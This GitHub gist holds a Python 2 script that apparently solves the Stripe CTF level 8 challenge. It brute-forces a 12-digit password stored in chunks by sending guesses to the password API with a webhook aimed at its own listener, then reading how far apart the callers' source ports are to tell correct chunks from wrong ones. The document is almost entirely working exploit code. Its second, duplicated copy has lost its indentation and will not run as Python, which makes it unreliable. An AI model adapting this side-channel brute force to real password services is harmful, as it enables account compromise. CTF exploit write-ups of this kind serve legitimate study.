philfreo/gist:3873801

## gistfile1.py
import thread
import sys
import socket
import time

HOST = ''
PORT = 50004

if 1:
    # local
    ABSOLUTE_HOST = '127.0.0.1:%s' % PORT
    API_URL = 'http://127.0.0.1:3000'
else:
    # production
    ABSOLUTE_HOST = 'level02-2.stripe-ctf.com:%s' % PORT
    API_URL = 'https://level08-4.stripe-ctf.com/user-ybcrziitrf/'
    sys.path.append('/home/user-oopeqmzzbx/requests-0.13.8')

# tweak this
MIN_DELTA = 3

FLAG_LENGTH = 12

# use requests & sessions so there is keep-alive
import requests
session = requests.session()

def receive(s):
    conn, addr = s.accept()
    port = addr[1]
    conn.close()
    return port

def send_request(i, prefix = '', webhook = ABSOLUTE_HOST):
    seeking = str(i).zfill(3)
    padding = '0' * (FLAG_LENGTH - len(prefix) - len(seeking))
    password = prefix + seeking + padding
    if webhook:
        data = '{"password": "%s", "webhooks": [ "%s" ]}' % (password, webhook)
    else:
        data = '{"password": "%s", "webhooks": []}' % (password)
        print password

    global session
    r = session.post(API_URL, data=data)
    resp = r.text

    """
    req = urllib2.Request(url)
    req.add_data(data)
    resp = urllib2.urlopen(req)
    resp = resp.read()
    """

    #print i, password, resp
    if 'true' in resp:
        print '*************************************************'
        print password
        print '*************************************************'
    sys.exit(0)

def find_a_chunk(s, min_delta, prefix = ''):
    last_port = 0
    nums_to_try = range(0, 1000)

    while len(nums_to_try) > 1:
        i = nums_to_try[0]
        nums_to_try.remove(i)

        args = (i, prefix)
        thread.start_new_thread(send_request, args)
        port = receive(s)

        if not last_port:
            last_port = port

        delta = port - last_port
        #print last_port, port, delta
        last_port = port

        if delta >= min_delta:
            print '%s is one of %s possibilities' % (i, len(nums_to_try))
            nums_to_try.append(i)

    chunk = str(nums_to_try[0]).zfill(3)
    print 'Chunk: %s' % chunk
    return chunk

def run():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((HOST, PORT))
    s.listen(1)

    chunk1 = find_a_chunk(s, MIN_DELTA)
    chunk2 = find_a_chunk(s, MIN_DELTA + 1, chunk1)
    chunk3 = find_a_chunk(s, MIN_DELTA + 2, '%s%s' % (chunk1, chunk2))

    prefix = chunk1 + chunk2 + chunk3
    for i in range(0, 1000):
        args = (i, prefix, '')
        thread.start_new_thread(send_request, args)
        time.sleep(0.1)

    print chunk1 + chunk2 + chunk3

    while True:
        time.sleep(1)

run()
	import thread
	import sys
	import socket
	import time

	HOST = ''
	PORT = 50004

	if 1:
	# local
	ABSOLUTE_HOST = '127.0.0.1:%s' % PORT
	API_URL = 'http://127.0.0.1:3000'
	else:
	# production
	ABSOLUTE_HOST = 'level02-2.stripe-ctf.com:%s' % PORT
	API_URL = 'https://level08-4.stripe-ctf.com/user-ybcrziitrf/'
	sys.path.append('/home/user-oopeqmzzbx/requests-0.13.8')

	# tweak this
	MIN_DELTA = 3

	FLAG_LENGTH = 12

	# use requests & sessions so there is keep-alive
	import requests
	session = requests.session()

	def receive(s):
	conn, addr = s.accept()
	port = addr[1]
	conn.close()
	return port

	def send_request(i, prefix = '', webhook = ABSOLUTE_HOST):
	seeking = str(i).zfill(3)
	padding = '0' * (FLAG_LENGTH - len(prefix) - len(seeking))
	password = prefix + seeking + padding
	if webhook:
	data = '{"password": "%s", "webhooks": [ "%s" ]}' % (password, webhook)
	else:
	data = '{"password": "%s", "webhooks": []}' % (password)
	print password

	global session
	r = session.post(API_URL, data=data)
	resp = r.text

	"""
	req = urllib2.Request(url)
	req.add_data(data)
	resp = urllib2.urlopen(req)
	resp = resp.read()
	"""

	#print i, password, resp
	if 'true' in resp:
	print '*************************************************'
	print password
	print '*************************************************'
	sys.exit(0)

	def find_a_chunk(s, min_delta, prefix = ''):
	last_port = 0
	nums_to_try = range(0, 1000)

	while len(nums_to_try) > 1:
	i = nums_to_try[0]
	nums_to_try.remove(i)

	args = (i, prefix)
	thread.start_new_thread(send_request, args)
	port = receive(s)

	if not last_port:
	last_port = port

	delta = port - last_port
	#print last_port, port, delta
	last_port = port

	if delta >= min_delta:
	print '%s is one of %s possibilities' % (i, len(nums_to_try))
	nums_to_try.append(i)

	chunk = str(nums_to_try[0]).zfill(3)
	print 'Chunk: %s' % chunk
	return chunk

	def run():
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
	s.bind((HOST, PORT))
	s.listen(1)

	chunk1 = find_a_chunk(s, MIN_DELTA)
	chunk2 = find_a_chunk(s, MIN_DELTA + 1, chunk1)
	chunk3 = find_a_chunk(s, MIN_DELTA + 2, '%s%s' % (chunk1, chunk2))

	prefix = chunk1 + chunk2 + chunk3
	for i in range(0, 1000):
	args = (i, prefix, '')
	thread.start_new_thread(send_request, args)
	time.sleep(0.1)

	print chunk1 + chunk2 + chunk3

	while True:
	time.sleep(1)

	run()